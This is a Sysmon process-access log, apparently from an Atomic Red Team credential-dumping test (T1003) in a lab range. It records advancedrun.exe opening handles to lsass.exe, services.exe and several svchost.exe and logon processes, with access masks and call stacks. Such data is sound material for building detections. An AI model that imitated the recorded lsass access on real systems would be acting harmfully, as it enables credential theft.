17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003980117Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003980116Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980115Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980114Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003980113Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980112Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003980111Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980110Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003980109Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980108Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980107Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980106Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980105Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980104Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980103Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980102Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980101Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
